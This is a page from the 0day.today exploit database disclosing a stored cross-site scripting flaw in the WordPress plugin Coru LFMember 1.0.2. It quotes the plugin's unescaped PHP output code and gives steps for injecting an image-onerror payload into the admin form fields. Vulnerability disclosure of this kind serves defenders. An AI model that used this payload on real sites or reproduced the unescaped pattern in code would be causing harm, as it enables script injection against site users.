[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Coru LFMember 1.0.2 Cross Site Scripting Vulnerability

Author
Mariam Tariq
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37668
Category
web applications
Date add
26-04-2022
Platform
php
# Exploit Title: WordPress Plugin Coru LFMember - Stored Cross Site
Scripting
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/
# Version: 1.0.2
# Tested on: Firefox
# Contact me: mariamtariq404@gmail.com



# Vulnerable Code:

```

<td class="manage-column"><input type="text" value="<?php print
$result['game_image'] ?>" name="game_image[]" /></td>
<td class="manage-column"><?php print
stripslashes($result['game_name_short']) ?></td>
<td class="manage-column"><input type="text" value="<?php print
stripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td>
<td class="manage-column"><textarea name="game_description[]" rows="4"
cols="10"><?php print stripslashes($result['game_description'])
?></textarea></td>
<td class="manage-column"><input type="text" value="<?php print
$result['game_link'] ?>" name="game_link[]" /></td>

```

# POC

1. Install the Coru LFMember WordPress plugin and activate it.
2. Go to LFMember -> Add New and inject XSS payload “><img src=x
onerror=alert(1)> in the fields given i.e, Game Image Name, Game Short
Name, Game Long Name, Game Description, and Links to.
3. XSS will trigger and will be stored.


## POC Image

https://imgur.com/kZDtIVz

#  0day.today [2024-09-28]  #